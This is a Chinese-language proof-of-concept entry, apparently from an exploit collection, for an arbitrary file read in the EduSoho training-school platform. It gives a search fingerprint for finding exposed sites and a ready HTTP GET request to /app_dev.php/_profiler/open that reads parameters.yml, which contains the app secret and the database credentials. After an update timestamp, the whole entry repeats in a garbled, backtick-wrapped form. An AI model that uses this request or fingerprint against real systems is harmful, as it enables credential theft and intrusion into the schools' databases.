Awesome-POC/Web应用漏洞/EduSoho 教培系统 app_dev.php 任意读取漏洞.md

# EduSoho 教培系统 app_dev.php 任意读取漏洞

## 漏洞描述

EduSoho 教培系统是由杭州阔知网络科技研发的开源网校系统。

通过向 /app_dev.php/_profiler/open 端点发送可以读取到 app/config/parameters.yml 文件的内容，拿到该文件中保存的 secret 值以及数据库账号密码等敏感信息。

## 漏洞影响

EduSoho 教培系统

## 网络测绘

```
"Powered By EduSoho"
```

## 漏洞复现

登录页面

![image-20231115095857573](images/image-20231115095857573.png)

指纹

![image-20231115095301932](images/image-20231115095301932.png)

poc

```
GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1
Host:  
Accept: */*
Content-Type: application/x-www-form-urlencoded
```

![image-20231115095838331](images/image-20231115095838331.png)
update 2024-11-06 14:10:36 +08:00			`# EduSoho 教培系统 app_dev.php 任意读取漏洞`

			`## 漏洞描述`

			`EduSoho 教培系统是由杭州阔知网络科技研发的开源网校系统。`

			`通过向 /app_dev.php/_profiler/open 端点发送可以读取到 app/config/parameters.yml 文件的内容，拿到该文件中保存的 secret 值以及数据库账号密码等敏感信息。`

			`## 漏洞影响`

			`EduSoho 教培系统`

			`## 网络测绘`

			```
			`"Powered By EduSoho"`
			```

			`## 漏洞复现`

			`登录页面`

			`![image-20231115095857573](images/image-20231115095857573.png)`

			`指纹`

			`![image-20231115095301932](images/image-20231115095301932.png)`

			`poc`

			```
			`GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1`
			`Host:`
			`Accept: /`
			`Content-Type: application/x-www-form-urlencoded`
			```

			`![image-20231115095838331](images/image-20231115095838331.png)`